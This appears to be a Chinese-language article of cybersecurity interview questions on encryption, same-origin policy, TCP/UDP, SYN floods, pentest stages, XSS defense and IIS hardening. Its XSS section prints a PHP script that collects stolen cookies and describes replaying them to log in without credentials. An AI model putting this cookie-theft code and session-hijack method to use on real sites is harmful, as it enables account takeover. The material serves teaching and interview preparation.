這份網絡安全面試題,你都懂了嗎?

對稱加密 非對稱加密?

對稱加密:加解密用同一密鑰,密鑰維護複雜 n(n-1)/2,不適合互聯網傳輸密鑰,加解密效率高。應用於加密數據。

非對稱加密:公鑰推不出私鑰,每個用戶一個非對稱密鑰對就可以,適合於互聯網傳輸公鑰,但是加密效率低,應用於數字簽名及加密。

什麼是同源策略?

為了防止不同域在用戶瀏覽器中彼此干擾,瀏覽器對從不同來源(域)收到的內容進行隔離。

瀏覽器不允許任何舊有腳本訪問一個站點的cookie,否則,會話容易被劫持。

只有發佈cookie的站點能夠訪問這些cookie,只有通過該站點返回的頁面所包含或加載的JavaScript才能訪問cookie。

cookie存在哪裡?可以打開嗎

C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies

工具--文件夾選項--查看--將隱藏被保護的文件的對勾去掉就會看到cookies文件夾。

xss如何盜取cookie?

攻擊者代碼:


$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意雙引號,容易出錯
fclose($cookietxt);
?>

腳本端:



獲取到cookie後,用firebug找到cookie,新建cookie

加入cookie,用referer來提交,無需輸入帳號密碼直接登錄進去!

這份網絡安全面試題,你都懂了嗎?

TCP、UDP的區別及TCP三次握手,SYN攻擊?

一、TCP、UDP區別

TCP的優點:

可靠,穩定

TCP的可靠體現在TCP在傳遞數據之前,會有三次握手來建立連接,而且在數據傳遞時,有確認、窗口、重傳、擁塞控制機制,在數據傳完後,還會斷開連接用來節約系統資源。

TCP的缺點:

慢,效率低,佔用系統資源高,易被攻擊

TCP在傳遞數據之前,要先建連接,這會消耗時間,而且在數據傳遞時,確認機制、重傳機制、擁塞控制機制等都會消耗大量的時間,而且要在每臺設備上維護所有的傳輸連接,事實上,每個連接都會佔用系統的CPU、內存等硬件資源。

而且,因為TCP有確認機制、三次握手機制,這些也導致TCP容易被人利用,實現DOS、DDOS、CC等攻擊。

UDP的優點:

快,比TCP稍安全

UDP沒有TCP的握手、確認、窗口、重傳、擁塞控制等機制,UDP是一個無狀態的傳輸協議,所以它在傳遞數據時非常快。沒有TCP的這些機制,UDP較TCP被攻擊者利用的漏洞就要少一些。但UDP也是無法避免攻擊的,比如:UDP Flood攻擊……

UDP的缺點:

不可靠,不穩定

因為UDP沒有TCP那些可靠的機制,在數據傳遞時,如果網絡質量不好,就會很容易丟包。

基於上面的優缺點,那麼:

什麼時候應該使用TCP:

當對網絡通訊質量有要求的時候,比如:整個數據要準確無誤的傳遞給對方,這往往用於一些要求可靠的應用,比如HTTP、HTTPS、FTP等傳輸文件的協議,POP、SMTP等郵件傳輸的協議。

在日常生活中,常見使用TCP協議的應用如下:

瀏覽器,用的HTTP

FlashFXP,用的FTP

Outlook,用的POP、SMTP

Putty,用的Telnet、SSH

QQ文件傳輸

…………

什麼時候應該使用UDP:

當對網絡通訊質量要求不高的時候,要求網絡通訊速度能儘量的快,這時就可以使用UDP。

比如,日常生活中,常見使用UDP協議的應用如下:

QQ語音

QQ視頻

TFTP

這份網絡安全面試題,你都懂了嗎?

二、TCP握手協議

在TCP/IP協議中,TCP協議提供可靠的連接服務,採用三次握手建立一個連接。

第一次握手:建立連接時,客戶端發送syn包(syn=j)到服務器,並進入SYN_SEND狀態,等待服務器確認;

第二次握手:服務器收到syn包,必須確認客戶的SYN(ack=j+1),同時自己也發送一個SYN包(syn=k),

即SYN+ACK包,此時服務器進入SYN_RECV狀態;

第三次握手:客戶端收到服務器的SYN+ACK包,向服務器發送確認包ACK(ack=k+1),此包發送完畢,

客戶端和服務器進入ESTABLISHED狀態,完成三次握手。

完成三次握手,客戶端與服務器開始傳送數據,在上述過程中,還有一些重要的概念:

未連接隊列:在三次握手協議中,服務器維護一個未連接隊列,該隊列為每個客戶端的SYN包(syn=j)開設一個條目,

該條目表明服務器已收到SYN包,並向客戶發出確認,正在等待客戶的確認包。這些條目所標識的連接在服務器處於Syn_RECV狀態,

當服務器收到客戶的確認包時,刪除該條目,服務器進入ESTABLISHED狀態。 backlog參數:表示未連接隊列的最大容納數目。

SYN-ACK 重傳次數 服務器發送完SYN-ACK包,如果未收到客戶確認包,服務器進行首次重傳,等待一段時間仍未收到客戶確認包,

進行第二次重傳,如果重傳次數超過系統規定的最大重傳次數,系統將該連接信息從半連接隊列中刪除。注意,每次重傳等待的時間不一定相同。

半連接存活時間:是指半連接隊列的條目存活的最長時間,也即服務從收到SYN包到確認這個報文無效的最長時間,

該時間值是所有重傳請求包的最長等待時間總和。有時我們也稱半連接存活時間為Timeout時間、SYN_RECV存活時間。

三、SYN攻擊原理

SYN攻擊屬於DOS攻擊的一種,它利用TCP協議缺陷,通過發送大量的半連接請求,耗費CPU和內存資源。

SYN攻擊除了能影響主機外,還可以危害路由器、防火牆等網絡系統,事實上SYN攻擊並不管目標是什麼系統,

只要這些系統打開TCP服務就可以實施。從上圖可看到,服務器接收到連接請求(syn=j),

將此信息加入未連接隊列,併發送請求包給客戶(syn=k,ack=j+1),此時進入SYN_RECV狀態。

當服務器未收到客戶端的確認包時,重發請求包,一直到超時,才將此條目從未連接隊列刪除。

配合IP欺騙,SYN攻擊能達到很好的效果,通常,客戶端在短時間內偽造大量不存在的IP地址,

向服務器不斷地發送syn包,服務器回覆確認包,並等待客戶的確認,由於源地址是不存在的,

服務器需要不斷的重發直至超時,這些偽造的SYN包將長時間佔用未連接隊列,正常的SYN請求被丟棄,

目標系統運行緩慢,嚴重者引起網絡堵塞甚至系統癱瘓。

證書要考哪些?

信息安全國際第一認證——CISSP

信息安全國內認證——CISAW

信息安全國內認證——CISP

信息安全技術實操認證新貴——Security+

IT審計人員的必備之證——CISA

DVWA是如何搭建的?

啟動xampp(XAMPP(Apache+MySQL+PHP+PERL)是一個功能強大的建站集成軟件包。)下的apache中間件和mysql

將dvwa放到xampp下的htdocs目錄下

在瀏覽器輸入http://127.0.0.1/dvwa 即可使用啦!

滲透測試的流程是什麼

滲透測試流程概述

前期交互階段、情報蒐集階段、威脅建模階段、漏洞分析階段、

滲透攻擊階段(Exploitation)、後滲透攻擊階段(怎麼一直控制,維持訪問)、報告階段。

攻擊前:網絡踩點、網絡掃描、網絡查點

攻擊中:利用漏洞信息進行滲透攻擊、獲取權限

攻擊後:後滲透維持攻擊、文件拷貝、木馬植入、痕跡擦除

xss如何防禦

1.對前端輸入做過濾和編碼:

比如只允許輸入指定類型的字符,比如電話號格式,註冊用戶名限制等,輸入檢查需要在服務器端完成,在前端完成的限制是容易繞過的;

對特殊字符進行過濾和轉義;

2.對輸出做過濾和編碼:在變量值輸出到前端的HTML時進行編碼和轉義;

3.給關鍵cookie使用http-only

IIS服務器應該做哪些方面的保護措施:

整理來源:http://www.williamlong.info/archives/118.html

1. 保持Windows升級:

2. 使用IIS防範工具

3. 移除缺省的Web站點

4. 如果你並不需要FTP和SMTP服務,請卸載它們

5. 有規則地檢查你的管理員組和服務:

6. 嚴格控制服務器的寫訪問權限

7. 設置複雜的密碼

8. 減少/排除Web服務器上的共享

9. 禁用TCP/IP協議中的NetBIOS:

10. 使用TCP端口阻塞

11. 仔細檢查*.bat和*.exe 文件: 每週搜索一次*.bat

12. 管理IIS目錄安全:

13. 使用NTFS安全:

14. 管理用戶賬戶

15. 審計你的Web服務器

這份網絡安全面試題,你都懂了嗎?


如果你還意猶未盡,歡迎點擊【瞭解更多】


分享到:


相關文章: